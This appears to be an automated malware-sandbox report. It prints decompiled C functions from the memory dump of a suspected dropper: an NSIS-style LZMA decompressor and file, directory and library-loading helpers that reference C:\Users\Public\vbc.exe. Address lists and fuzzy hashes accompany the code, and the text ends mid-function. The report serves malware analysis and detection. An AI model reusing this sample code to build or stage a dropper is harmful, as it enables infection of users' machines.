                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t274 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t274;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t283 = __ebp - 0x64;
                                                											 *_t283 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t283;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L79:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L80;
                                                										case 0x1c:
                                                											while(1) {
                                                												L123:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t414 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t414;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t414;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L80:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											goto L170;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}













                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				intOrPtr _t15;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t15 =  *0x423f70; // 0x6029b4
                                                					_t6 = _t17 * 0x1c + _t15;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x42372c =  *0x42372c + _t12;
                                                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
                                                					}
                                                				}
                                                				return 0;
                                                			}













                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405F28(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x409208);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
                                                				}
                                                				_t5 = E00405EBA(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}






                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                  • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040586F(CHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesA(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}






                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405850(CHAR* _a4) {
                                                				signed char _t3;
                                                
                                                				_t3 = GetFileAttributesA(_a4); // executed
                                                				if(_t3 != 0xffffffff) {
                                                					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t3;
                                                			}





                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004053C3(CHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}





                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                • GetLastError.KERNEL32 ref: 004053D7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403081(void* _a4, long _a8) {
                                                				int _t6;
                                                				long _t10;
                                                
                                                				_t10 = _a8;
                                                				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                				if(_t6 == 0 || _a8 != _t10) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}






                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004030B3(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}


                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000081E4), ref: 004030C1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 25%
                                                			E10008882() {
                                                				void* _t1;
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				void* _t7;
                                                
                                                				_push(1);
                                                				_push(0);
                                                				_push(0); // executed
                                                				_t1 = E100088E9(_t2, _t3, _t4, _t7); // executed
                                                				return _t1;
                                                			}


                                                APIs
                                                • _doexit.LIBCMT ref: 10008888
                                                  • Part of subcall function 100088E9: __lock.LIBCMT ref: 100088F7
                                                  • Part of subcall function 100088E9: RtlDecodePointer.NTDLL(10019368,0000001C,1000887D,?,00000001,00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008936
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008947
                                                  • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008960
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(-00000004,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008970
                                                  • Part of subcall function 100088E9: EncodePointer.KERNEL32(00000000,?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008976
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 1000898C
                                                  • Part of subcall function 100088E9: DecodePointer.KERNEL32(?,1000865A,000000FF,?,10009F3B,00000011,?,?,1000CB3C,0000000D), ref: 10008997
                                                  • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089BF
                                                  • Part of subcall function 100088E9: __initterm.LIBCMT ref: 100089D0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 3712619029-0
                                                • Opcode ID: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                • Instruction ID: e6994391439ff2091fcc02a30716a5b2c18efe1f1a304855d421632494bfa426
                                                • Opcode Fuzzy Hash: 20a20f608ea4bc6c94e18f730bbbe563946a4bfee6b1cba253202f95a216a98f
                                                • Instruction Fuzzy Hash: F3A00269BD430021F86091502C43F5825016750F41FD44050FB482C1C5E8C623585257
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 96%
                                                			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
